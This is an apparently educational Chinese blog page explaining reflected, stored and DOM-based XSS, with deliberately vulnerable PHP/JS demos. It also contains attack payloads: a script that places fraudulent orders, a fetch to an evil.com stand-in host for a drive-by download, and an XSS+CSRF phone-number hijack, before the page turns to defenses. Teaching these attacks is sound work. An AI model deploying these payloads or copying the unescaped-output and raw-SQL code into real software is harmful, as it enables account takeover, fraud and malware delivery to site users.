<!DOCTYPE html>
<html class="dark" lang="en" prefix="og: http://ogp.me/ns# 
fb: http://ogp.me/ns/fb#
article: http://ogp.me/ns/article#">
<head>
    <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="keywords" content="">

<title>一篇文章了解XSS || 菜鸟web手</title>
<link rel="icon" href="http://yunli060903images/wang.icon" type="image/x-icon">
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<meta property="og:title" content="一篇文章了解XSS">
<meta property="og:type" content="website">
<meta property="og:url" content="http://yunli060903/2025/11/21/xss%E6%80%BB%E7%BB%93/index.html">
<meta property="og:image" content="">
<meta property="og:site_name" content="菜鸟web手">
<meta property="og:author" content="yunli">

  
  
  
  <meta name="description" content="xss都快忘得差不多，赶快再来read一下，这次好好吃细点原理什么是xss呢？xss全名Cross-sitescripting，简单来说就是前端页面存在可写入风险，黑客通过特殊的手段往网页中插入了恶意的JavaScript脚本，从而在用户浏览网页时，对用户浏览器发起Cookie资料窃取、会话劫持、钓鱼欺骗等各">


<script src="/js/wang.js"></script>

<link rel="stylesheet" href="/css/wang.css">
<script> console.log("Hello,world"); </script>
<meta name="generator" content="Hexo 8.1.1"></head>
<body>
<main>
    <div id="agplAlert" style="z-index: 9999;">
    <strong>请遵守AGPL 3.0协议</strong> 本主题已开源于<a target="_blank" rel="noopener" href="https://github.com/xingwangzhe/hexo-theme-wang">hexo-theme-wang</a>
</div>
    <header>
    <nav>
        <ul>
            
                <li>
                    <a href="/" rel="noopener">
                        
                            <img src="/images/menu_ico/home.svg" class="menu-icon" alt="Home">
                        
                        Home
                    </a>
                </li>
            
                <li>
                    <a href="/archives" rel="noopener">
                        
                            <img src="/images/menu_ico/archives.svg" class="menu-icon" alt="Archives">
                        
                        Archives
                    </a>
                </li>
            
                <li>
                    <a href="/categories" rel="noopener">
                        
                            <img src="/images/menu_ico/categories.svg" class="menu-icon" alt="Categories">
                        
                        Categories
                    </a>
                </li>
            
                <li>
                    <a href="/tags" rel="noopener">
                        
                            <img src="/images/menu_ico/tags.svg" class="menu-icon" alt="Tags">
                        
                        Tags
                    </a>
                </li>
            
                <li>
                    <a href="/about" rel="noopener">
                        
                            <img src="/images/menu_ico/about.svg" class="menu-icon" alt="About">
                        
                        About
                    </a>
                </li>
            
                <li>
                    <a href="/links" rel="noopener">
                        
                            <img src="/images/menu_ico/links.svg" class="menu-icon" alt="Links">
                        
                        Links
                    </a>
                </li>
            
                <li>
                    <a href="/atom.xml" rel="noopener">
                        
                            <img src="/images/menu_ico/rss.svg" class="menu-icon" alt="RSS">
                        
                        RSS
                    </a>
                </li>
            
                <li>
                    <a target="_blank" href="https://www.travellings.cn/go.html" rel="noopener noopener">
                        
                            <img src="/images/menu_ico/train.svg" class="menu-icon" alt="Travelling">
                        
                        Travelling
                    </a>
                </li>
            
            
                <li>
                    <button class="search-toggle-btn" aria-label="Open search">
                        <img src="/images/menu_ico/search.svg" class="menu-icon" alt="search">
                        Search
                    </button>
                </li>
            
        </ul>
    </nav>
</header>

<script src="/js/header.js"></script>

    
<script src="/js/search.js"></script>


    
        <!-- 搜索模态框 -->
        <div id="search-modal" class="search-modal">
          <div class="search-modal-content">
            <div class="search-header">
              <form class="search-form" action="#" onsubmit="return false;">
                <input type="text" id="search-input" placeholder="Search for articles" autocomplete="off">
                <button type="button" class="search-close-btn" aria-label="Close">
                  <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
                    <line x1="18" y1="6" x2="6" y2="18"></line>
                    <line x1="6" y1="6" x2="18" y2="18"></line>
                  </svg>
                </button>
              </form>
            </div>
            <div id="search-results"></div>
          </div>
        </div>

        <script>
        // 向全局对象添加i18n数据，以便search.js使用
        window.WANG_THEME = window.WANG_THEME || {};
        window.WANG_THEME.i18n = {
          search: {
            noResults: 'No results found',
            loading: 'Loading...',
            placeholder: 'Search for articles',
            close: 'Close',
            shortcut_tip: 'Press ESC to close',
            toggle_search: 'Open search',
            error_loading: 'Failed to load search data'
          }
        };
        </script>
    
    <aside class="sidebar-container sidebar-left">
    <div class="sidebar-bg">
        <h2 class="site-title">菜鸟web手</h2>
        <img class="avatar avatar-round" src="/images/avatar.webp" style="width:50px;" alt="网站头像">
        <h2 class="site-author">yunli</h2>
        <h3 class="site-subtitle"></h3>
    </div>
    <div class="sidebar-bg">
        <ul class="social_links">
            
                <li>
                    <a target="_blank" rel="noopener" href="https://github.com/yunli060903" aria-label="Github的链接">
                        
                            <div style="display: flex; margin-left: auto; margin-left: auto; justify-content: center;">
                                <img src="/images/social_links/github.svg" class="icon" alt="Github的图标"><p>Github</p>
                            </div>
                        
                    </a>
                </li>
            
                <li>
                    <a target="_blank" rel="noopener" href="https://github.com/yunli060903" aria-label="Email的链接">
                        
                            <div style="display: flex; margin-left: auto; margin-left: auto; justify-content: center;">
                                <img src="/images/social_links/github.svg" class="icon" alt="Email的图标"><p>Email</p>
                            </div>
                        
                    </a>
                </li>
            
        </ul>
    </div>
</aside>
<div class="post-container">
  <article class="post">
    <h1 class="post-title">一篇文章了解XSS</h1>

    <div class="post-meta">
      <span class="post-date">Posted on <time datetime="2025-11-20T16:00:00.000Z">2025-11-21</time></span>
      
        <span class="post-categories">
          Category：<a class="category-link" href="/categories/%E6%8A%80%E6%9C%AF%E5%88%86%E4%BA%AB/">技术分享</a>
        </span>
      
      
        <span class="post-updated">
          Last Updated <time datetime="2025-11-21T06:14:23.050Z">2025-11-21</time>
        </span>
      
      <span style="margin-left:10px;">👁<span id="busuanzi_value_page_pv"></span></span>
    </div>
    <div class="post-content">
      <p>xss都快忘得差不多，赶快再来read一下，这次好好吃细点</p>
<h2>原理</h2>


<p>什么是xss呢？</p>
<p>xss全名Cross-site scripting，简单来说就是前端页面存在可写入风险，黑客通过特殊的手段往网页中插入了恶意的 JavaScript 脚本，从而在用户浏览网页时，对用户浏览器发起 Cookie 资料窃取、会话劫持、钓鱼欺骗等各攻击  。</p>
<h2>xss三种类型</h2>



<h4>反射型</h4>

<p>反射型也称作非持久型、参数型跨站脚本。反射型 XSS 只是简单地把用户输入的数据 “反射” 给浏览器。也就是说，黑客往往需要诱使用户 “点击” 一个恶意链接，才能攻击成功。</p>
<p>假设一个网页直接把用户参数输出到页面上</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$input = $_GET[&#x27;param&#x27;];</span><br><span class="line">echo &quot;&lt;h1&gt;&quot;.$input.&quot;&lt;/h1&gt;&quot;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>用户向 <code>param</code> 提交的数据会展示到 <code>&lt;h1&gt;</code> 的标签中展示出来，比如提交：<code>hi xss</code></p>
<p><img src="C:\Users\save\AppData\Roaming\Typora\typora-user-images\image-20251118153908828.png" alt="image-20251118153908828"></p>
<p>如果传<code>&lt;script&gt;alert(&quot;hehe&quot;)&lt;/script&gt;</code></p>
<p><img src="C:\Users\save\AppData\Roaming\Typora\typora-user-images\image-20251118154152452.png" alt="image-20251118154152452"></p>
<p>用户输入的 Script 脚本，已经被写入页面中，因为后端代码并未对输入进行过滤审查，网页会将js代码拼接进网页代码，并且执行</p>
<h4>存储型</h4>

<p>存储型 XSS 和反射型 XSS 的差别仅在于：提交的 XSS 代码会存储在服务端（不管是数据库、内存还是文件系统等），下次请求目标页面时不用再提交 XSS 代码。最典型的例子是留言板 XSS。</p>
<p>这边数据库搭建和后端编写都参考一下国光的</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">&lt;meta charset=<span class="string">&quot;utf-8&quot;</span>&gt;</span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">/*数据库信息配置*/</span></span><br><span class="line"><span class="variable">$host</span> = <span class="string">&quot;localhost&quot;</span>; <span class="comment">//数据库地址</span></span><br><span class="line"><span class="variable">$port</span> = <span class="string">&quot;3306&quot;</span>; <span class="comment">//数据库端口</span></span><br><span class="line"><span class="variable">$user</span> = <span class="string">&quot;root&quot;</span>; <span class="comment">//数据库用户名</span></span><br><span class="line"><span class="variable">$pwd</span> = <span class="string">&quot;root&quot;</span>; <span class="comment">//数据库密码</span></span><br><span class="line"><span class="variable">$dbname</span> = <span class="string">&quot;xss&quot;</span>; <span class="comment">//数据库名</span></span><br><span class="line"><span class="variable">$conn</span> = <span class="keyword">new</span> <span class="title function_ invoke__">mysqli</span>(<span class="variable">$host</span>,<span class="variable">$user</span>,<span class="variable">$pwd</span>,<span class="variable">$dbname</span>,<span class="variable">$port</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br><span class="line">&lt;!-- 前端用户输入表单 --&gt;</span><br><span class="line">&lt;h1&gt;留言板的存储型XSS&lt;/h1&gt;</span><br><span class="line">&lt;form  method=<span class="string">&quot;post&quot;</span>&gt;</span><br><span class="line">&lt;input type=<span class="string">&quot;text&quot;</span> name=<span class="string">&quot;username&quot;</span> placeholder=<span class="string">&quot;姓名&quot;</span>&gt;</span><br><span class="line">&lt;input type=<span class="string">&quot;text&quot;</span> name=<span class="string">&quot;message&quot;</span> placeholder=<span class="string">&quot;请输入您的留言&quot;</span>&gt;</span><br><span class="line">&lt;input type=<span class="string">&quot;submit&quot;</span>&gt;</span><br><span class="line">&lt;/form&gt;</span><br><span class="line"></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="comment">/*直接将留言插入到数据库中*/</span></span><br><span class="line">    <span class="variable">$username</span>=<span class="variable">$_POST</span>[<span class="string">&#x27;username&#x27;</span>];</span><br><span class="line">    <span class="variable">$message</span>=<span class="variable">$_POST</span>[<span class="string">&#x27;message&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$username</span> <span class="keyword">and</span> <span class="variable">$message</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="variable">$sql</span>=<span class="string">&quot;INSERT INTO `message`(`username`, `message`) VALUES (&#x27;<span class="subst">&#123;$username&#125;</span>&#x27;,&#x27;<span class="subst">&#123;$message&#125;</span>&#x27;)&quot;</span>;</span><br><span class="line">        <span class="keyword">if</span> (<span class="variable">$conn</span>-&gt;<span class="title function_ invoke__">query</span>(<span class="variable">$sql</span>) === <span class="literal">TRUE</span>) &#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;留言成功&quot;</span>.<span class="string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;Error: &quot;</span> . <span class="variable">$sql</span> . <span class="string">&quot;&lt;br&gt;&quot;</span> . <span class="variable">$conn</span>-&gt;error;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;请填写完整信息&quot;</span>.<span class="string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/*查询数据库中的留言信息*/</span></span><br><span class="line">    <span class="variable">$sql</span> = <span class="string">&quot;SELECT username, message FROM message&quot;</span>;</span><br><span class="line">    <span class="variable">$result</span> = <span class="variable">$conn</span>-&gt;<span class="title function_ invoke__">query</span>(<span class="variable">$sql</span>);</span><br><span class="line">    <span class="keyword">if</span> (<span class="variable">$result</span>-&gt;num_rows &gt; <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">while</span>(<span class="variable">$row</span> = <span class="variable">$result</span>-&gt;<span class="title function_ invoke__">fetch_assoc</span>()) &#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;用户名：&quot;</span> . <span class="variable">$row</span>[<span class="string">&quot;username&quot;</span>]. <span class="string">&quot;留言内容:&quot;</span> . <span class="variable">$row</span>[<span class="string">&quot;message&quot;</span>].<span class="string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;暂无留言&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="C:\Users\save\AppData\Roaming\Typora\typora-user-images\image-20251118160632916.png" alt="image-20251118160632916"></p>
<p>上面就是代码运行的结果，可以写入用户与姓名，且结果会展现在页面并存入数据库，无论任何用户何时访问当前网站都会出现留言板的信息，此时若有恶意攻击者写入js脚本在留言板中，就会导致后面所有访问的用户都执行该js脚本</p>
<p>我们试验一下，在留言处写入<code>&lt;script&gt;alter(11)&lt;/script&gt;</code></p>
<p><img src="C:\Users\save\AppData\Roaming\Typora\typora-user-images\image-20251118161043719.png" alt="image-20251118161043719"></p>
<p><img src="C:\Users\save\AppData\Roaming\Typora\typora-user-images\image-20251118161027213.png" alt="image-20251118161027213"></p>
<p>结果符合我们的设想，存储型 XSS 的攻击是最隐蔽的也是危害比较大的，普通用户所看的 URL 为 <code>http://localhost/php/xss/save.php</code>，从 URL 上看均是正常的，但是当目标用户查看留言板时，那些留言的内容会从数据库查询出来并显示，浏览器发现有 XSS 代码，就当做正常的 HTML 与 JS 解析执行，于是就触发了 XSS 攻击。</p>
<h4>dom型</h4>

<p>通过修改页面的 DOM 节点形成的 XSS，称之为 DOM XSS。它和反射型 XSS、存储型 XSS 的差别在于，DOM XSS 的 XSS 代码并不需要服务器解析响应的直接参与，触发 XSS 靠的就是浏览器端的 DOM 解析，可以认为完全是客户端的事情。</p>
<p>【DOM 节点（DOM Node）是 <strong>文档对象模型（Document Object Model）</strong> 的基本组成单位，DOM 将 HTML&#x2F;XML 文档视为一个由节点组成的树形结构，每个节点代表文档中的一部分（如标签、文本、属性等）】</p>
<p>代码依旧参考国光</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">&quot;UTF-8&quot;</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">xss</span>(<span class="params"></span>)&#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> str = <span class="variable language_">document</span>.<span class="title function_">getElementById</span>(<span class="string">&quot;src&quot;</span>).<span class="property">value</span>;</span></span><br><span class="line"><span class="language-javascript">        <span class="variable language_">document</span>.<span class="title function_">getElementById</span>(<span class="string">&quot;demo&quot;</span>).<span class="property">innerHTML</span> = <span class="string">&quot;&lt;img src=&#x27;&quot;</span>+str+<span class="string">&quot;&#x27; /&gt;&quot;</span>;</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;text&quot;</span> <span class="attr">id</span>=<span class="string">&quot;src&quot;</span> <span class="attr">size</span>=<span class="string">&quot;50&quot;</span> <span class="attr">placeholder</span>=<span class="string">&quot;输入图片地址&quot;</span> /&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;button&quot;</span> <span class="attr">value</span>=<span class="string">&quot;插入&quot;</span> <span class="attr">onclick</span>=<span class="string">&quot;xss()&quot;</span> /&gt;</span><span class="tag">&lt;<span class="name">br</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">div</span> <span class="attr">id</span>=<span class="string">&quot;demo&quot;</span> &gt;</span><span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br></pre></td></tr></table></figure>





<p><img src="C:\Users\save\AppData\Roaming\Typora\typora-user-images\image-20251118163404078.png" alt="image-20251118163404078"></p>
<p>同样，这里也没有对用户的输入进入过滤，当攻击者构造<code>&#39; onerror=&#39;alert(233)</code>插入的时候：</p>
<p><img src="C:\Users\save\AppData\Roaming\Typora\typora-user-images\image-20251118164348975.png" alt="image-20251118164348975"></p>
<p>会直接在 <code>img</code> 标签中插入 <code>onerror</code> 事件，该语句表示当图片加载出错的时候，自动触发后面的 alert () 函数，来达到弹窗的效果，这就是一个最简单的 DOM 型 XSS 漏洞。</p>
<p>但更正式点的dom型应该 对 <strong><code>window.location</code>、<code>document.URL</code>、<code>document.referrer</code>、<code>document.cookie</code></strong> 等包含用户可控数据的对象进行操作</p>
<h4>三种类型区别</h4>

<p>对三种xss都有了解过后，我们来聊聊三种xss都有什么区别</p>
<p>dom型与反射型和存储型最大的区别就是：dom型由客户端独立完成，不经过服务端</p>
<p>恶意脚本<strong>不在服务器返回的 HTML 源码中</strong>，仅在客户端执行 JS 后动态插入 DOM，查看页面源码无法发现，需通过浏览器开发者工具（Elements 面板）查看动态生成的 DOM。</p>
<p>而反射型与存储型都需要服务端的参与，反射型是服务端将恶意数据反射回客户端，存储型也会将恶意数据反射回客户端， 但<strong>恶意脚本会被永久存储在服务器中</strong>，反射型的生命周期只有一次</p>
<h2>xss利用</h2>

<p>要学会防护，当然要先学会利用（文中出现的利用都是设想情况，无实际利用过，具体利用可以自己搭靶场测试）</p>
<p>xss有以下利用方式：</p>
<ol>
<li>网络钓鱼</li>
<li>盗取用户 cookies 信息</li>
<li>劫持用户浏览器</li>
<li>强制弹出广告页面、刷流量</li>
<li>网页挂马</li>
<li>进行恶意操作，例如任意篡改页面信息</li>
<li>获取客户端隐私信息</li>
<li>控制受害者机器向其他网站发起攻击</li>
<li>结合其他漏洞，如 CSRF 漏洞，实施进一步作恶</li>
<li>提升用户权限，包括进一步渗透网站</li>
<li>传播跨站脚本蠕虫等</li>
</ol>
<ul>
<li><p><strong>劫持用户浏览器</strong></p>
<p>注入的恶意脚本和用户正常操作的脚本拥有完全相同的权限，能：</p>
<ul>
<li><p>操作页面 DOM（点击按钮、填充表单、触发事件）。</p>
</li>
<li><p>发起网络请求（携带用户的 Cookie、会话凭证）。</p>
</li>
<li><p>读取 &#x2F; 修改页面数据（获取表单内容、修改提交参数）。</p>
<p>因为操作在用户已登录的上下文执行，网站服务器会默认这些操作是用户本人发起的，完全不会拦截，风险比单纯窃取信息更直接.</p>
</li>
<li><p>简单写个代码举例介绍一下</p>
<p>一个购物网站存在存储型xss</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript"><span class="variable language_">window</span>.<span class="property">onload</span> = <span class="keyword">function</span>(<span class="params"></span>) &#123;</span></span><br><span class="line"><span class="language-javascript">  <span class="variable language_">document</span>.<span class="title function_">querySelector</span>(<span class="string">&#x27;[data-product-id=&quot;10086&quot;] .add-cart-btn&#x27;</span>).<span class="title function_">click</span>();</span></span><br><span class="line"><span class="language-javascript">  <span class="built_in">setTimeout</span>(<span class="function">() =&gt;</span> &#123;</span></span><br><span class="line"><span class="language-javascript">    <span class="variable language_">window</span>.<span class="property">location</span>.<span class="property">href</span> = <span class="string">&#x27;/checkout&#x27;</span>;</span></span><br><span class="line"><span class="language-javascript">  &#125;, <span class="number">1000</span>);</span></span><br><span class="line"><span class="language-javascript">  <span class="built_in">setTimeout</span>(<span class="function">() =&gt;</span> &#123;</span></span><br><span class="line"><span class="language-javascript">    <span class="variable language_">document</span>.<span class="title function_">querySelector</span>(<span class="string">&#x27;#receiver-name&#x27;</span>).<span class="property">value</span> = <span class="string">&#x27;张三&#x27;</span>;</span></span><br><span class="line"><span class="language-javascript">    <span class="variable language_">document</span>.<span class="title function_">querySelector</span>(<span class="string">&#x27;#receiver-phone&#x27;</span>).<span class="property">value</span> = <span class="string">&#x27;138xxxx8888&#x27;</span>;</span></span><br><span class="line"><span class="language-javascript">    <span class="variable language_">document</span>.<span class="title function_">querySelector</span>(<span class="string">&#x27;#receiver-address&#x27;</span>).<span class="property">value</span> = <span class="string">&#x27;XX市XX区XX路XX号&#x27;</span>;</span></span><br><span class="line"><span class="language-javascript">    <span class="variable language_">document</span>.<span class="title function_">querySelector</span>(<span class="string">&#x27;.submit-order-btn&#x27;</span>).<span class="title function_">click</span>();</span></span><br><span class="line"><span class="language-javascript">  &#125;, <span class="number">2000</span>);</span></span><br><span class="line"><span class="language-javascript">&#125;;</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>当用户（已登录电商账号，且账户有余额 &#x2F; 绑定支付方式）浏览该商品评价时，脚本自动执行：</p>
<ul>
<li>无需用户操作，自动将高价海鲜加入购物车。</li>
<li>跳转结算页后，填充攻击者的收货地址。</li>
<li>直接提交订单，触发支付（若用户开通了 “免密支付”，则直接扣款）。</li>
</ul>
<p>网站服务器收到订单请求时，因携带用户的登录会话 Cookie，判定为用户本人操作，成功创建订单并完成支付。用户直到收到扣款通知，才发现被恶意下单。</p>
</li>
</ul>
</li>
<li><p><strong>网页挂马</strong></p>
<p>XSS 是 “入口”，负责将恶意触发代码植入可信页面；真正的 “挂马” 依赖恶意资源（攻击脚本、漏洞利用程序、病毒文件）和用户环境漏洞（浏览器旧版本、插件漏洞、系统漏洞），两者结合完成从 “脚本执行” 到 “设备受控” 的升级。</p>
<p>例子：</p>
<p>攻击者发现某购物网站的 “商品问答区” 存在存储型 XSS 漏洞，注入代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;div onclick=&quot;fetch(&#x27;http://evil.com/load-attack&#x27;)&quot;&gt;点击查看商品隐藏优惠（仅限前100人）&lt;/div&gt;</span><br></pre></td></tr></table></figure>

<ul>
<li><p><code>attack.js</code>检测用户浏览器版本存在的漏洞，加载对应漏洞利用脚本。</p>
</li>
<li><p>脚本下载恶意程序<code>shopping-voucher.exe</code>（伪装成 “优惠券领取工具”）。</p>
</li>
<li><p>弹出弹窗：“领取优惠券需安装安全插件，点击运行即可使用”，用户点击 “运行” 后，恶意程序执行。</p>
</li>
<li><p>恶意程序在用户设备上安装后门，回连攻击者 C2 服务器，用户电脑被完全控制，后续可能被窃取支付密码、银行信息等。</p>
</li>
</ul>
</li>
<li><p><strong>xss+csrf</strong></p>
<p>以 “篡改用户绑定手机号” 为例，完整攻击链路如下</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">  <span class="comment">// 1. XSS脚本读取页面中的CSRF Token（假设在隐藏表单中）</span></span></span><br><span class="line"><span class="language-javascript">  <span class="keyword">const</span> csrfToken = <span class="variable language_">document</span>.<span class="title function_">querySelector</span>(<span class="string">&#x27;input[name=&quot;csrf_token&quot;]&#x27;</span>).<span class="property">value</span>;</span></span><br><span class="line"><span class="language-javascript">  <span class="comment">// 2. 自动构造“修改手机号”的POST请求（CSRF攻击）</span></span></span><br><span class="line"><span class="language-javascript">  <span class="title function_">fetch</span>(<span class="string">&#x27;/api/change-phone&#x27;</span>, &#123;</span></span><br><span class="line"><span class="language-javascript">    <span class="attr">method</span>: <span class="string">&#x27;POST&#x27;</span>,</span></span><br><span class="line"><span class="language-javascript">    <span class="attr">headers</span>: &#123; <span class="string">&#x27;Content-Type&#x27;</span>: <span class="string">&#x27;application/x-www-form-urlencoded&#x27;</span> &#125;,</span></span><br><span class="line"><span class="language-javascript">    <span class="attr">body</span>: <span class="string">`csrf_token=<span class="subst">$&#123;csrfToken&#125;</span>&amp;new_phone=攻击者手机号`</span>,</span></span><br><span class="line"><span class="language-javascript">    <span class="attr">credentials</span>: <span class="string">&#x27;include&#x27;</span> <span class="comment">// 携带用户登录Cookie</span></span></span><br><span class="line"><span class="language-javascript">  &#125;);</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>

<ol>
<li><strong>用户触发 XSS</strong>：其他用户（已登录）浏览含恶意评论的页面时，脚本自动执行。</li>
<li><strong>CSRF 请求生效</strong>：脚本携带用户的登录 Cookie 和合法 CSRF Token 发起请求，服务器验证通过（认为是用户本人操作），成功将手机号改为攻击者的号码。</li>
</ol>
</li>
</ul>
<h2>xss防护</h2>



<p>在介绍具体防护之前，先介绍一些基础知识</p>
<h4>Httponly</h4>


<p>HttpOnly是Cookie中一个属性，用于防止客户端脚本通过document.cookie属性访问Cookie，有助于保护Cookie不被跨站脚本攻击窃取或篡改。但是，HttpOnly的应用仍存在局限性，一些浏览器可以阻止客户端脚本对Cookie的读操作，但允许写操作；此外大多数浏览器仍允许通过XMLHTTP对象读取HTTP响应中的Set-Cookie头。</p>
<ul>
<li>设置样例</li>
</ul>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">response.<span class="title function_">setHeader</span>( <span class="string">&quot;Set-Cookie&quot;</span> , <span class="string">&quot;cookiename=httponlyTest;Path=/;Domain=domainvalue;Max-Age=seconds;HTTPOnly&quot;</span>);</span><br><span class="line">  例如：</span><br><span class="line"><span class="comment">//设置cookie</span></span><br><span class="line"><span class="comment">//Path=/：限制 Cookie 的作用路径。</span></span><br><span class="line"></span><br><span class="line">response.<span class="title function_">addHeader</span>(<span class="string">&quot;Set-Cookie&quot;</span>, <span class="string">&quot;uid=112; Path=/; HttpOnly&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">//设置多个cookie</span></span><br><span class="line"></span><br><span class="line">response.<span class="title function_">addHeader</span>(<span class="string">&quot;Set-Cookie&quot;</span>, <span class="string">&quot;uid=112; Path=/; HttpOnly&quot;</span>);</span><br><span class="line"></span><br><span class="line">response.<span class="title function_">addHeader</span>(<span class="string">&quot;Set-Cookie&quot;</span>, <span class="string">&quot;timeout=30; Path=/test; HttpOnly&quot;</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">//设置https的cookie</span></span><br><span class="line"></span><br><span class="line">response.<span class="title function_">addHeader</span>(<span class="string">&quot;Set-Cookie&quot;</span>, <span class="string">&quot;uid=112; Path=/; Secure; HttpOnly&quot;</span>);</span><br><span class="line"><span class="comment">//Secure：限制 Cookie 仅在 HTTPS 加密连接中传输，HTTP 明文连接不会携带该 Cookie。</span></span><br></pre></td></tr></table></figure>



<h4>SOP(Same-origin policy)</h4>


<p>同源策略是一种网络浏览器安全机制，旨在防止网站之间相互攻击。</p>
<p>同源策略限制一个源上的脚本访问另一个源上的数据。源由 URI 协议、域名和端口号组成。同源就意味着协议，域名，端口都必须相同，访问其下子目录则没问题</p>
<ul>
<li>同源政策存在多种例外情况：<ul>
<li>有些对象可以跨域写入，但不能跨域读取，例如来自 iframe 或新窗口的 <code>location</code>对象或属性。<code>location.href</code></li>
<li>有些对象是可读的，但不能跨域写入，例如对象<code>length</code>的属性<code>window</code>（存储页面上使用的帧数）和<code>closed</code>属性。</li>
<li>该<code>replace</code>函数通常可以跨域调用对象<code>location</code>。</li>
